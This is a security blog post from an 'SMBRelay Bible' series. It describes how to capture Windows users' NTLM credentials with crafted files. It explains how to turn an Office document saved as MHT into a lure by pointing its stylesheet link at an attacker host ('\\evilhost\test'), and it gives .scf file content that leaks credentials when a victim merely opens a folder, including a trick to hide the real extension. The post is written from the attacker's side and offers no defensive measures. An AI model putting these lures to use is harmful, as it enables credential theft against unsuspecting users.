SMBRelay Bible 6: SMBRelay attacks on corporate users part 2

Let’s continue our talk about the variants of client-side attacks and turn our attention to MS Office documents. As it was mentioned in the last blogpost, we can create crafted Office document and send it to users (via e-mail for example). When a user opens it, an office program tries to connect to our server and give us user credentials.

Such situation occurs because:

  • Almost all MS Office programs have capability to read HTML file or MHT file (MHT file – MHTML, short for MIME HTML, is a web page archive format)
  • MS Office’s documents can be saved as HTML file or MHT file without loss of document’s formatting.
  • MS Office programs detect how to parse and process a document by its content, not by file extension.

Thereby, we should do next sequence of actions to create a crafted MS Office document.

We save any office document as a HTML file or MHT file. The second one is better because there will be only one file containing all the parts of documents.

Then we change (or create) “href” attribute of “LINK rel=stylesheet” element from default value to a link to our server. Then we rename the file to a normal Office document extension (DOC for example). A crafted document is ready. The method is very simple as we can see.

Example of code: <link rel=stylesheet href="\\evilhost\test">

I would like to highlight some interesting features.

Office programs understand “href” attribute both with a UNC path (\\evilhost\test) and with a HTTP path (http://evilhost/test). So we can catch user’s credentials via HTTP with NTLM.

MS Office programs show an attention to our victim if it couldn’t download content from a remote resource. So we should put a document which we have created for a victim on our shared resource. And when a MS Office program opens a crafted document, it takes style sheet from our shared resource and doesn’t show an attention to a victim.

Windows Explorer and shared resources

In addition to the last blog post, we have found some specified files, which can give us necessary UNC-request from a user without attention to him.

Autorun.inf

All of us know about “autorun.inf” and problems which it gives to common users via different viruses. Thereby, there are some interesting facts: autorun.inf can cause UNC-request by Explorer and it works with a Mapped Network Drives. But the last patch for Windows OS disables the Autorun functionality.

.SCF file – Explorer Shell Command File.

This is a special file type, which contains commands for Windows Explorer. The example of such file is “ToggleDesktop” button. However the information about all commands and all capabilities of the file type is not available, this file extension “is one of the special ones that remains hidden even if you instruct Windows to show file extensions”.

For our purpose we can create or use any file, add next code to it and add “.SCF” to file extension. An original file extension will be shown to a user, but Explorer will see .scf and perform all the commands in that are in this file. Explorer gives user’s credential when the user looks at a folder with such .scf file.

[shell]
Command=2
IconFile=\\evilhost\test
[TaskBar]
Command=Explorer

Thanks for your attention.

Do you want more?

Subscribe me to your mailing list